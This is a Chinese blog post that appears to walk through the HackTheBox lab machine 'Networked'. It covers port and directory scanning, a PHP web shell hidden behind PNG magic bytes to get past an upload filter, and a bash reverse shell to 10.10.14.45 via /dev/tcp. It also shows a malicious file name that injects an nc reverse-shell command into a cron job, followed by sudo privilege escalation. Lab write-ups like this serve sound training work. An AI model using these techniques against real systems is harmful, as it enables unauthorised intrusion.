Networked

Posted by on 2020年2月28日


Networked

nmap扫描端口

ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.146 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -A 10.10.10.146

file

dirb扫描目录

dirb http://10.10.10.146 /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

file

下载backup.tar

wget http://10.10.10.146/backup/backup.tar

file
file

查看upload.php和lib.php,进行简单的代码审计
1.检测文件MIME和文件大小:
图片类型image/
小于60000byte
2.后缀为:
‘.jpg’, ‘.png’, ‘.gif’, ‘.jpeg’

gedit shell.php.png

file

绕过mime

echo '89 50 4E 47 0D 0A 1A 0A' | xxd -p -r > mime_shell.php.png
cat shell.php.png >> mime_shell.php.png

file

访问:http://10.10.10.146/photos.php

file

执行命令:
whoami
http://10.10.10.146/uploads/10_10_14_45.php.png?cmd=whoami

file

get apache shell

kali:nc -vlp 4444

kali:curl -G --data-urlencode 'cmd=bash -c "bash -i >& /dev/tcp/10.10.14.45/4444 0>&1"' http://10.10.10.146/uploads/10_10_14_45.php.png

file

/home/guly 目录下
check_attack.php
crontab.guly
user.txt

file

查看check_attack.php和crontab.guly,得出结论:
每三分钟会执行check_attack.php
check_attack.php中:
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
$path = ‘/var/www/html/uploads/’;

get guly shell | user.txt

cd /var/www/html/uploads
touch '; nc 10.10.14.45 5555 -c bash'

file

kali:
nc -vlp 5555
python -c "import pty;pty.spawn('/bin/bash')"

file

提权

查看sudo列表,尝试执行/usr/local/sbin/changename.sh
get root shell

sudo -l
sudo /usr/local/sbin/changename.sh

file

get root.txt

file




发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据